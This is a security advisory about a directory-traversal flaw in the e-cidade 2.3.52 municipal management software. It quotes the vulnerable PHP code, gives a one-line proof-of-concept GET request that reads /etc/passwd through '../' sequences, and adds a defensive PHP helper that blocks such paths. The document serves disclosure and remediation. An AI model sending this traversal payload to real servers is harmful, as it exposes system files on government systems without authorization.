E-Cidade 2.3.52 Directory Traversal

Published: 2016.08.28
Credit: vesp3r
Risk: Medium
CWE: CWE-22
CVE: N/A
Local: No
Remote: Yes

E-cidade Directory Traversal
Vendor: DBSeller (www.dbseller.com.br)
Product: E-cidade - Software Publico de Gestao Municipal
Vulnerability discovered by vesp3r - vesp3r7c3@gmail.com


Product Description
--------------------

Intended to computerize the management of Brazilian municipalities. This includes computerized integration
between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.
Saving resources is only one of the advantages of adopting e-cidade; others are the freedom to choose
suppliers and the assured continuity of the system, since it is supported by the Ministry of Planning.

Modules:

- HUMAN RESOURCES MANAGEMENT
- GEOPROCESSING
- HEALTH MANAGEMENT
- EDUCATION MANAGEMENT
- BUSINESS INTELLIGENCE
- FINANCIAL MANAGEMENT
- TAX MANAGEMENT
- ASSET MANAGEMENT

Advisory Timeline
-----------------

No vendor response


Vulnerable version:
-------------------

2.3.52 and prior

Vulnerability
-------------

The vulnerability exists in the 'mostrarelatorio.php' file of the package:
the 'arquivo' variable is read from the GET request and concatenated to "/tmp/".
The resulting path is passed to the file() function and the file contents are stored in a variable called 'arq',
so '../' sequences in 'arquivo' make the script read files outside /tmp.

/fpdf151/mostrarelatorio.php:
-----------------------------

[Snip...]

if(!file_exists("/tmp/".$arquivo)) {
  echo "<script>
          alert('Codigo nao Encontrado.');
          window.close();
        </script>";
  exit;
}

[Snip...]

$pdf=new PDF();
$pdf->Open();
$pdf->AliasNbPages();
$pdf->AddPage();
$arq = file("/tmp/".$arquivo);

[Snip...]

Proof of Concept
---------------

GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1
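
One way to constrain the file lookup described above, as an added example (not e-cidade's code and not a vendor patch): a helper that rejects names containing path separators and then verifies that the resolved path stays inside the base directory. The function name resolveReportPath(), the demo directory and the file names are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not part of the e-cidade code base.
// Assumption: reports are plain files stored directly inside one base directory.

// Resolve a user-supplied report name to a real path inside $baseDir.
// Returns null when the name is malformed, missing, or escapes $baseDir.
function resolveReportPath(string $baseDir, string $name): ?string
{
    // Reject empty names, NUL bytes and any directory separator up front.
    if ($name === '' || strpbrk($name, "/\\\0") !== false) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // realpath() collapses "." and ".." and follows symlinks, so the
    // containment check runs on the file that would really be opened.
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($real === false || !is_file($real)) {
        return null;
    }

    // Compare against "$base/" so that "/tmp" does not also match "/tmpfoo".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: one legitimate report plus the value from the request above.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'report_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'relatorio.txt', "linha 1\n");

foreach (['relatorio.txt', './../../../../../../etc/passwd', '..', 'missing.txt'] as $candidate) {
    $path = resolveReportPath($base, $candidate);
    printf("%-35s => %s\n", $candidate, $path === null ? 'rejected' : 'allowed');
}

unlink($base . DIRECTORY_SEPARATOR . 'relatorio.txt');
rmdir($base);
```

In mostrarelatorio.php a check of this kind would sit in front of both the file_exists() and the file() calls, with "/tmp" as the base directory.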



Copyright 2017, cxsecurity.com